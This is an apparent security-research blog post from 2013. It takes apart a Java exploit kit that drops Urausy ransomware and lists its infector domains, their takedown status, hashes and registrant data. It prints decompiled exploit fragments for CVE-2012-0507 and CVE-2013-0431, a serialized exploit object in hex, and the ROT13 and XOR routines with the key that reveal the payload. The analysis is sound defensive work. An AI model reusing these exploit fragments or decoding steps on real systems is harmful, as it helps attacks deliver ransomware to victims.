Friday, April 5, 2013

Mistery of unknown EK using JAR exploit with Hidden Class & XOR-Encoded Embedded RansomWare

This is the great teamwork, never be a personal work, I thank you the below wonderful team who helped the problem completely solved within 12hrs: @Cephurs @nyxbone @kahusecurity @a..om @essachin @rjacksix and @GloverDonovan + the rest of our friends who supported this mission

We had the active infectors is coming from the various urls as per below:

rootaliasx.biz/traff.html
dexthous.biz/traff.html
antestent.biz/hava.html
bastapils.biz/hava.html
bastapils.biz/traff.html
mzthtl.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
ggooec.freewww.info/freeporn.html
zcmgiawwm.freewww.info/freeporn.html
asikdycf.wikaba.com/freeporn.html
hfncudbeu.wikaba.com/sextour.html
vjbgaz.freewww.info/freeporn.html
uekfnibe.wikaba.com/freeporn.html
bcmht.freewww.info/11111111.html
delphilol.biz/testo.html
xkshgc.wikaba.com/sextour.html
      :
      : (many more!)
And we need to dismantle these domains ASAP.
So everything was in a hurry since Friday is to come soon.

[NEW] Quoted #Tango Dismantling Report Sat Apr 6 01:54:29 JST 2013:

==========================================================================
DOMAIN NAMES           A RECORD   NS SERVERS         SUSPENSION STATUS
--------------------------------------------------------------------------
rootaliasx.biz,,         IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
dexthous.biz,,           IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
antestent.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
bastapils.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
bastapils.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
delphilol.biz,,          IP DOWN  NORTH.INAPPLE.COM  SUSPENSION IN PROCESS
                                  SOUTH.INAPPLE.COM
                                  WEST.INAPPLE.COM
                                  EAST.INAPPLE.COM
mzthtl.freewww.info,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
ggooec.freewww.info,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
zcmgiawwm.freewww.info,, IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
asikdycf.wikaba.com,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
hfncudbeu.wikaba.com,,   IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
vjbgaz.freewww.info,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
uekfnibe.wikaba.com,,    IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
bcmht.freewww.info,,     IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
xkshgc.wikaba.com,,      IP DOWN      DNS DOWN       SUSPENSION COMPLETE!
     :                      :             :               : 

It is an Exploit Kit with the panel below:
(* In the end we were informed by @kafaine it's a RedDorv2 Exploit Kit)

The landing page infector contains the HTML like:
--2013-04-05 10:50:54--  h00p://rootaliasx.biz/traff.html
Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111
Caching rootaliasx.biz => 46.4.179.111
Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected.
GET /traff.html HTTP/1.0
Host: rootaliasx.biz
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Apr 2013 05:20:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Cache-Control: no-store, no-cache
Expires: Fri, 05 Apr 2013 05:20:27 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 551
  :
200 OK
Length: 551 [text/html]
Saving to: `traff.html'
2013-04-05 10:50:56 (36.4 MB/s) - `traff.html' saved [551/551]
With the HTML code : As per coded it lead to the JAR file:
--2013-04-04 14:40:45--  h00p://rootaliasx.biz/traff.jar
Resolving rootaliasx.biz... seconds 0.00, 46.4.179.111
Caching rootaliasx.biz => 46.4.179.111
Connecting to rootaliasx.biz|46.4.179.111|:80... seconds 0.00, connected.
  :
GET /traff.jar HTTP/1.0
Host: rootaliasx.biz
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Apr 2013 09:10:45 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.23
Content-Disposition: attachment; filename="traff.jar"
Content-Length: 63706
Cache-Control: no-store, no-cache
Expires: Thu, 04 Apr 2013 09:10:17 GMT
Vary: Accept-Encoding,User-Agent
  :
200 OK
Length: 63706 (62K) [application/java-archive]
Saving to: `traff.jar'
2013-04-04 14:40:53 (8.32 KB/s) - `traff.jar' saved [63706/63706]
IP involved in the infection: ↑All IPs are in HELZNER Germany Network. Under below registrant:
inetnum:        46.4.179.64 - 46.4.179.127
netname:        VPSSERVER
descr:          vpsserver
country:        DE
admin-c:        VK1952-RIPE
tech-c:         VK1952-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
source:         RIPE Filtered"

person:         Viacheslav Krivosheev
address:        vps-server
address:        Poliykovskaiy 8a
address:        153011 IVANOVO
address:        RUSSIAN FEDERATION"
phone:          +79106677787
fax-no:         +74932502950
nic-hdl:        VK1952-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

JAR File Details: (Thanks to VT for the format)

SHA1: f8e433a2190017d9bd866374d6adfc124409e83e
MD5: 8a928628fa5d3e43db4ca1ae6d0213b6
File size: 62.2 KB ( 63705 bytes )
File name: traff.jar
File type: JAR
Some pcaps..& more evidence: Is the multiple class of Java archive executable, contains embedded object. The traff.jar classes is having components as follows:
I: System environment sniffer
C: The main class to be called from landing page
D: Contains hidden W.class and XOR logic with its key
K: String translation + cascaded with char rotator logic obfuscatoin
S: Embedded object extractor logic, used same key as XOR
A: Has some exploit methods/codes with some obfuscation.
TRAFF: An embedded object trailed at the bottom (in HEX)
To understand the flow we must reverse it and to understand the decryption goes. We much think backward, start with the lower step of obfuscation and build things up. The most obfuscation is mainly using K.Class. @Cephurs was recognizing it right away with the ROT13 logic while I was so dumb to start on XOR parts (Thank's friend!)
To make it simple it was rotating the chars with below logic in Java:
public static String rot13(String paramString)
  {
    String str = "";
    int i = 13;

    for (int j = 0; j < paramString.length(); j++)
    {
      char c = paramString.charAt(j);
      if ((c >= 'a') && (c <= 'm')) c = (char)(c + i);
      else if ((c >= 'A') && (c <= 'M')) c = (char)(c + i);
      else if ((c >= 'n') && (c <= 'z')) c = (char)(c - i);
      else if ((c >= 'N') && (c <= 'Z')) c = (char)(c - i);
      str = str + c;
    }
    return str;
  }
Which is resulting in rotation character below:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz 
NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm
And all of the strings in K.Class can be converted into below table:
wnin.frphevgl.preg.Pregvsvpngr                              java.security.cert.Certificate               
wnin.frphevgl.PbqrFbhepr                                    java.security.CodeSource          
wnin.frphevgl.Crezvffvbaf                                   java.security.Permissions               
svyr:                                                       file:                                 
frg                                                         set                                     
fha.bet.zbmvyyn.wninfpevcg.vagreany.Pbagrkg                 sun.org.mozilla.javascript.internal.Context                             
pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe                   com.sun.jmx.mbeanserver.MBeanInstantiator                           
H                                                           U                                   
cbejAXOIiDNOD                                               porwNKBVvQABQ                                               
1.7                                                         1.7                                     
wnin.vb.gzcqve                                              java.io.tmpdir  
svaqPynff                                                   findClass                                     
jimVfWd.rkr                                                 wvzIsJq.exe  
bf.anzr                                                     os.name                                     
wnink.znantrzrag.ZOrnaFreire                                javax.management.MBeanServer            
cbejAXOIiDNOD                                               porwNKBVvQABQ  
arjZOrnaFreire                                              newMBeanServer  
pbz.fha.wzk.zornafreire.Vagebfcrpgbe                        com.sun.jmx.mbeanserver.Introspector                    
Jvaqbjf                                                     Windows                                       
wnin.vb.gzcqve                                              java.io.tmpdir   
wnin.frphevgl.NyyCrezvffvba                                 java.security.AllPermission           
wnink.znantrzrag.ZOrnaFreireQryrtngr                        javax.management.MBeanServerDelegate                    
I                                                           V                                   
C                                                           P                                                                               
tnzr.J                                                      game.W                                  
ryrzragSebzPbzcyrk                                          elementFromComplex  
cbejAXOIiDNOD                                               porwNKBVvQABQ 
wnin.frphevgl.CebgrpgvbaQbznva                              java.security.ProtectionDomain                                                          
GGSPg.rkr                                                   TTFCt.exe                                     
fha.bet.zbmvyyn.wninfpevcg.vagreany.TrarengrqPynffYbnqre    sun.org.mozilla.javascript.internal.GeneratedClassLoader                                        
wnin.frphevgl.CrezvffvbaPbyyrpgvba                          java.security.PermissionCollection                  
wnin.irefvba                                                java.version   
pbz.fha.wzk.zornafreire.WzkZOrnaFreire                      com.sun.jmx.mbeanserver.JmxMBeanServer                      
trgZOrnaVafgnagvngbe                                        getMBeanInstantiator                                                
nqq                                                         add                                                                           
nprq0005757200135o4p6n6176612r6p616r672r4s626n6563743o90pr  aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200095b4c67616d652e413bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003                                                                                
cbejAXOIiDNOD                                               porwNKBVvQABQ                                         
qrpynerqZrgubqf                                             declaredMethods                                           
wnin.frphevgl.Crezvffvba                                    java.security.Permission 
For the table picture is here: See the long var "aced...blah blah" string? Is actually a Java class with the insides is CVE-2012-0507 code↓
0000   AC ED 00 05 75 72 00 13 5B 4C 6A 61 76 61 2E 6C    ....ur..[Ljava.l
0010   61 6E 67 2E 4F 62 6A 65 63 74 3B 90 CE 58 9F 10    ang.Object;..X..
0020   73 29 6C 02 00 00 78 70 00 00 00 02 75 72 00 09    s)l...xp....ur..
0030   5B 4C 67 61 6D 65 2E 41 3B FE 2C 94 11 88 B6 E5    [Lgame.A;.,.....
0040   FF 02 00 00 78 70 00 00 00 01 70 73 72 00 30 6A    ....xp....psr.0j
0050   61 76 61 2E 75 74 69 6C 2E 63 6F 6E 63 75 72 72    ava.util.concurr
0060   65 6E 74 2E 61 74 6F 6D 69 63 2E 41 74 6F 6D 69    ent.atomic.Atomi
0070   63 52 65 66 65 72 65 6E 63 65 41 72 72 61 79 A9    cReferenceArray.
0080   D2 DE A1 BE 65 60 0C 02 00 01 5B 00 05 61 72 72    ....e`....[..arr
0090   61 79 74 00 13 5B 4C 6A 61 76 61 2F 6C 61 6E 67    ayt..[Ljava/lang
00A0   2F 4F 62 6A 65 63 74 3B 78 70 71 00 7E 00 03       /Object;xpq.~..
OK, we got the table. What's next?

Unlocked encoding logic

Put all K.class vars in the rest of the classes variables & that will make you understand the exploitation use completely: In I class it detects OS Name and Java Versions:
(9):  String str1 = System.getProperty(K.BvKs70); /// System.getProperty(os.name); 
(24): String str8 = System.getProperty(K.sATQ);   /// System.getProperty(java.version);
(32): String str10 = getParameter(K.JgUQEqm);     /// getParameter(U); 
(40): String str14 = getParameter(K.HS0g);        /// getParameter(V);
And also IMPORTANT condition of infection (main windows + Java >= 1.7)
(58): (str1.indexOf(K.jp1jj) >= 0)   // if (str1.indexOf(Windows) >= 0)
(83): if (str8.startsWith(K.adxAi3j))   // if (str8.startsWith(1.7))
In A class :
(27):  URL localURL = new URL(K.F5vzTsGa + "//");   → URL localURL = new URL("file:" + "//");
(43):  Class localClass1 = Class.forName(K.zDCn9Y);  → Class localClass1 = Class.forName("java.security.cert.Certificate");
(68):  Class localClass2 = Class.forName(K.dy3rkh);  → Class localClass2 = Class.forName("java.security.Permissions"); 
(86):  Class localClass3 = Class.forName(K.hkhQ5O);  → Class localClass3 = Class.forName("java.security.Permissions");
(98):  Method localMethod = localClass2.getMethod(K.Url1a, new Class[] { localClass3 }); →  K.Url1a == "add"
(100): localMethod.invoke(localObject2, new Object[] { Class.forName(K.ZklLSir).newInstance() }); → K.ZklLSir == "java.security.AllPermission"
(113): Class localClass4 = Class.forName(K.tmc3I);  → "java.security.ProtectionDomain"
(117): Class localClass5 = Class.forName(K.SNku);   → "java.security.Permissions"
(133): Class localClass6 = Class.forName(K.uKIX_p);  → "java.security.PermissionCollection"
(195): Class localClass7 = paramA.defineClass(K.Jb928E, D.decoded, 0, i104, (ProtectionDomain)localObject4); // "game.W"
(211): String str49 = System.getProperty(K.p6BEDfqv);   → "java.io.tmpdir"
(218): String str51 = "\\" + K.JuUKXjj;   → "TTFCt.exe"
(263): localConstructor3.newInstance(new Object[] { paramString1, paramString2, paramString3, "0", str49 + str51, S.class.getClassLoader().getResourceAsStream(paramString3), K.PH8cd4 });
                                                      → "porwNKBVvQABQ"
In C Class:
(73): ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(X(K.TvUD3yH4)));
↑This will getting the binary stream CVE-2012-0507 to be loaded. because the :
K.TvUD3yH4 = "aced000575...(snipped)...f626a6563743b787" 
And..
(96): localObject[1].getClass().getMethod(K.I4VwpS8, new Class[] { Integer.TYPE, Object.class }).invoke(localObject[1], new Object[] { Integer.valueOf(0), getClass().getClassLoader() });
  → K.I4VwpS8 == "set"
This is the abuse of the getMethod of - java.lang.reflect.Method invoke() method CVE-2012-4820 In the K Class, let's see what bad actors tried to hide: javax.management.MBeanServer was imported as per encoded:
(128): public static String uuIj = new String(rot13("wnink.znantrzrag.ZOrnaFreire"));
(301): public static String ZyZhnh5a = new String(rot13("pbz.fha.wzk.zornafreire.WzkZOrnaFreire"));
com.sun.jmx.mbeanserver.Introspector was imported as per encoded:
(62):  public static String Qj7BnL = new String(rot13("pbz.fha.wzk.zornafreire.ZOrnaVafgnagvngbe"));
(148): public static String dradg2 = new String(rot13("pbz.fha.wzk.zornafreire.Vagebfcrpgbe"));
and javax.management.MBeanServerDelegate:
(182): public static String i_fJGSy = new String(rot13("wnink.znantrzrag.ZOrnaFreireQryrtngr"));
In the S class was written:
(14):  Class localClass = Class.forName(K.dradg2);  // Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector); 
(17):  Method localMethod1 = localClass.getMethod(K.vpAhSF, new Class[] { Object.class, String.class });
(20):  Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, K.uATab_ });
(103): Class localClass1 = Class.forName(K.ZyZhnh5a);
(118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(K.i_fJGSy), Boolean.TYPE });
(139): Class localClass2 = Class.forName(K.Qj7BnL);
(149): Method localMethod2 = localClass1.getMethod(K.n7tOG, new Class[0]);
(173): Method localMethod3 = localClass2.getMethod(K.lKCeXn, new Class[] { String.class, ClassLoader.class });
(188): Class localClass1 = fItgag(K.Mg7ws1);
(226): Class localClass2 = fItgag(K.YoILBY);
(262): String str27 = System.getProperty(K.aPd5);
(269): String str30 = "\\" + K.H95l4;
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), K.F8pYg2tfr });
which is actually means:
(14):  Class localClass = Class.forName(com.sun.jmx.mbeanserver.Introspector);
(17):  Method localMethod1 = localClass.getMethod(elementFromComplex, new Class[] { Object.class, String.class });
(20):  Method[] arrayOfMethod1 = (Method[])(Method[])localMethod1.invoke(null, new Object[] { paramObject, declaredMethods });
(103): Class localClass1 = Class.forName(com.sun.jmx.mbeanserver.JmxMBeanServer);
(118): Method localMethod1 = localClass1.getMethod(K.CqAw, new Class[] { String.class, Class.forName(K.uuIj), Class.forName(javax.management.MBeanServerDelegate), Boolean.TYPE });
(139): Class localClass2 = Class.forName(com.sun.jmx.mbeanserver.Introspector);
(149): Method localMethod2 = localClass1.getMethod(getMBeanInstantiator, new Class[0]);
(173): Method localMethod3 = localClass2.getMethod(findClass, new Class[] { String.class, ClassLoader.class });
(188): Class localClass1 = fItgag(sun.org.mozilla.javascript.internal.Context);
(226): Class localClass2 = fItgag(sun.org.mozilla.javascript.internal.GeneratedClassLoade);
(262): String str27 = System.getProperty(java.io.tmpdir);
(269): String str30 = "\\" + "wvzIsJq.exe";
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });
OK, we have all codes decoded, we can read all codes now! Good, first let's see if we can recognize the exploitation used..

Exploitation

Varied of exploitation methods and code detected, mainly is aimed the abuse of getMethod invoke(), combined with loading JmxMBeanServer's components. It is aiming for Java version 1.7. I tried to infect myself with 1.6.x and ended up with crash:

Shortly. These are the list of exploitation(CVE/CWE) method I can spot:
CVE-2012-4820: java.lang.reflect.Method invoke() method 
CWE-578: EJB Bad Practices use of Class Loader
CVE-2012-0507 Java AtomicReferenceArray Type Violation
CVE-2013-0431 Getting access to restricted classes (via com.sun.jmx.mbeanserver.MBeanInstantiator) 

Payload

This case is interesting. Because we see two ways gain the payload here, just grep the .exe in the above decoded classes code and you'll get:
A.class with payload: "TTFCt.exe"
S.class with the payload: "wvzIsJq.exe"

First route to payload...

Payload was coded to be defined by the below code as a class. Is it really a class?

Class localClass7 = paramA.defineClass("game.W", 
     D.decoded, 0, i104, 
    (ProtectionDomain)localObject4);
Which is the Game.W doesn't exist in the classes list!
So there is a hidden class in D.Class with"decoded"function.

:-) ↓We can see the decoded XOR key used...

public static byte[] decoded = XorDecrypt(encoded, "porwNKBVvQABQ");
。。to decrypt this array in D Class.. (Which I assumed it was an encoded shellcode in quick analysis)
public static byte[] encoded = { -70, -111, -..
.., 35, 89, 65, 20, 86, 112, 56, 120, 119, 22, ..
..5, 89, 81, 58, 101, 114, 84, 78, 1, 69, 86, 6..
... 29, 47, 61, 35, 121, 31, 62, 110, 11, 63, 0,..
...3, 48, 56, 30, 8, 73, 94, 2, 33, 35, 32, 23, ..
... 0, 48, 110, 46, 48, 30, 8, 93, 36, 58, 57, 4..
..., 16, 97, 24, 54, 36, 31, 63, 38, 121, 120, 3..
...4, 80, 65, 90, 59, 17, 25, 19, 88, 39, 36, 10..
... 112, -24, 114, -2, 66, 75, -56, 86, -3, 80, ..
To make it clear.. a pic :-)↓ ↑This Array was loaded by the below loading-logic loops:
public static byte[] XorDecrypt(byte[] paramArrayOfByte, String paramString)
{ int i = 0; for (int j = 0; i < paramArrayOfByte.length; j = (j + 1) % paramString.length())
  { int tmp12_11 = i; paramArrayOfByte[tmp12_11] = (byte)(paramArrayOfByte[tmp12_11] 
   ^ paramString.charAt(j));
Into paramArrayOfByte to be soted in to localObject4, which having definition object below: (trailed it↓)
↓localObject4 = localConstructor1.newInstance(new Object[] { localObject3, localObject2 });
↓localObject3 = localConstructor2.newInstance(new Object[] { localURL, localObject1 });
↓localObject2 = localMethod1.invoke(null, new Object[] { "", null, null, Boolean.valueOf(true) });
localObject1 = Array.newInstance(localClass1, 0)
↑Yes, the code will treat the object as a Java class after you XOR the array.
This class will extract TRAFF embedded file & save it with file://TTFCt.exe.
While I was on decoding the vars , Daryll of Kahu Security was successfully extracted this 1st. :-) So you'd better also read Kahu Security good post about extracting EXE payload file saved from this. Here is the Kahu Security post's link-->>[HERE]
:-))) OK. End of the first method.

Second route to payload, a bypass :-)

This is the second route of getting the binary payload. Let's see it further, now, what is inside of the TRAFF embedded object? A binary? Another Class?
We detected 31KB Object "traff" is a encoded exe embedded in jar:
-rwxr--r--  1 MMD  toor  31232 Apr  3 22:44 "traff"*
looks like this encoded data:
0000   3D 35 F2 77 4F 4B 42 56 72 51 51 42 AE 8F 6F 72    =5.wOKBVrQQB..or
0010   37 4F 4B 42 56 76 51 41 02 51 70 6F 72 77 4E 4B    7OKBVvQA.QporwNK
0020   42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76    BVvQABQporwNKBVv
0030   51 41 42 51 70 6F 72 77 4E 4B 42 56 F6 51 41 42    QABQporwNKBV.QAB
0040   5F 6F D5 7C 77 FA 42 8F 77 CE 50 0D 8F 70 24 07    _o.|w.B.w.P..p$.
0050   1B 04 6E 3B 30 39 11 23 20 2F 71 13 0E 1C 19 21    ..n;09.# /q....!
0060   3F 62 34 13 71 33 37 3F 50 06 1C 57 0A 04 11 76    ?b4.q37?P..W...v
0070   1B 3E 25 27 7F 7D 65 56 77 4E 4B 42 56 76 51 41    .>%'.}eVwNKBVvQA
0080   12 14 70 6F 3E 76 4B 4B 45 62 2A 00 41 42 51 70    ..po>vKKEb*.ABQp
0090   6F 72 77 4E AB 42 58 77 5A 40 43 16 70 6D 72 77    orwN.BXwZ@C.pmrw
 :                        :                                     :
7820   05 46 08 71 27 61 F1 5F F4 47 C0 7B D5 66 E9 61    .F.q’a._.G.{.f.a
7830   E4 72 E1 40 D9 42 C8 7E 8E 72 9C 46 81 71 98 61    .r.@.B.~.r.F.q.a
7840   99 5F 64 46 7D 7A 1D 67 08 60 C6 73 F7 41 D9 43    ._dF}z.g.’.s.A.C
7850   92 7F A6 73 56 76 51 41 42 51 70 6F 72 77 4E 4B    ...sVvQABQporwNK
7860   42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76    BVvQABQporwNKBVv
7870   51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42    QABQporwNKBVvQAB
7880   51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F    QporwNKBVvQABQpo
 :                       :                                      : 
7990   42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70    BQporwNKBVvQABQp
79A0   6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77    orwNKBVvQABQporw
79B0   4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B 42    NKBVvQABQporwNKB
79C0   56 76 51 41 42 51 70 6F 72 77 4E 4B 42 56 76 51    VvQABQporwNKBVvQ
79D0   41 42 51 70 6F 72 77 4E 4B 42 56 76 51 41 42 51    ABQporwNKBVvQABQ
79E0   70 6F 72 77 4E 4B 42 56 76 51 41 42 51 70 6F 72    porwNKBVvQABQpor
79F0   77 4E 4B 42 56 76 51 41 42 51 70 6F 72 77 4E 4B    wNKBVvQABQporwNK
To be clear.. a Pic :-)↓ ↑Can you see the XOR pattern? :D
Yes, but we should confirm XOR key which is supposed in the hidden W.class..back to the the D.class...
But wait!! there is another clue! In the decoded code in S.Class, it was mentioned "again":
localClass3 = (Class)localMethod3.invoke(localObject2, new Object[] { null, D.decoded });
If we trail it further we found that the same XOR key"porwNKBVvQABQ" is used. Strange! This is suggesting the automation scheme in this Exploit Kit in obfuscating any of the payload embedded with XOR. See the XOR key in the end of string below↓
(311): localConstructor.newInstance(new Object[] { paramString1, paramString2, paramString3, "1", str27 + str30, S.class.getClassLoader().getResourceAsStream(paramString3), porwNKBVvQABQ });
Traced it more to come up with loading of new object to drop a file:
str27 = System.getProperty(java.io.tmpdir);
str30 = "\\" + "wvzIsJq.exe";
So this could be it, jumped to FreeBSD shell to XOR the TRAFF "porwNKBVvQABQ" key
$ myxorwraper.py -l 13 -k porwNKBVvQABQ ./traff
./20130405100541.out
$ ls -alF 20130405100541.out
"-rwxr--r--  1 xxx xxx  31232 Apr  5 19:06 20130405100541.out*"
That's the XOR result. ↓Here's that PE Infor:
Exif++:
MIMEType                  : application/octet-stream
Subsystem                 : Windows GUI
MachineType               : Intel 386 or later, and compatibles
TimeStamp                 : 2013:04:03 14:52:07+01:00
CompileTime               : 2013-04-03 13:52:07
FileType                  : Win32 EXE
PEType                    : PE32
CodeSize                  : 512
LinkerVersion             : 1.71
InitializedDataSize       : 29696
SubsystemVersion          : 4.0
ImageVersion              : 0.0
OSVersion                 : 1.0
UninitializedDataSize     : 0

Sections:
   .code 0x1000 0x1fa 512
   .data 0x2000 0x6d3c 28160
   .edata 0x9000 0x50 512
   .idata 0xa000 0x1d4 512
   .reloc 0xb000 0x54 512

Entry Point at 0x400
Virtual Address is 0x401000
  :              
0000   4D 5A 80 00 01 00 00 00 04 00 10 00 FF FF 00 00    MZ..............
0010   40 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00    @.......@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0A 24 00 00 00 00 00 00 00 00    mode...$........
0080   50 45 00 00 4C 01 05 00 07 34 5C 51 00 00 00 00    PE..L....4.Q....
Looks like I bumped into @rjacksix's uploaded sample in VT ;-) URL-->>[HERE]
SHA256: bab60825b4e25ecbe42981514b3854451eeb542b2bf7efdf65c1dac1d1b47b2d
SHA1: 8c9f66d79f2b798cc655612af41d51ed53c9f222
MD5: 2a933a291f92e2a257c5cb0875b227a2
File size: 30.5 KB ( 31232 bytes )
File name: 2a933a291f92e2a257c5cb0875b227a2.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 5 / 46
Analysis date: 2013-04-04 17:06:37 UTC ( 17 hours, 6 minutes ago )
Malware names;
Panda                    : Trj/Dtcontx.C
Symantec                 : WS.Reputation.1
CAT-QuickHeal            : (Suspicious) - DNAScan
Kaspersky                : Trojan-Ransom.Win32.Foreign.bdjg
Microsoft                : Trojan:Win32/Urausy.D
↑here we are, a Ransomware. See tweet by @nyxbone: Please block all url and of the IP mentioned above.
In my test cases before infecting & crash my PC is sent DNS request to the host below:
↑It requesting A record to callback to domain testodrom.biz
you can see right before crash the malform packet was generated..

If you got infected by this ransomware you'll find these files in %AppData% and some changes in registry pointing autostart of these "AltShell". These are the self-copied of the payload, and to be executed by shell environment.

Kudoz! MalwareMustDie Team!

Quick note to "wack" the bins...

Thank's to @kafeine for informing EK info;
The quick analysis I made is linked here-->>[HERE]
(Used Google drive because pastebin blocked me "again" somehow)
I realized that the-2hours-made quick (halfway) analysis information is incorrect and rough in some points, so please refer to this post for the valid information, with thank you for be patient with us solving difficult case.
 

Samples

We shared the samples for the research & raising detection ratio:
Download is here-->>[HERE]

#MalwareMustDie!

1 comment: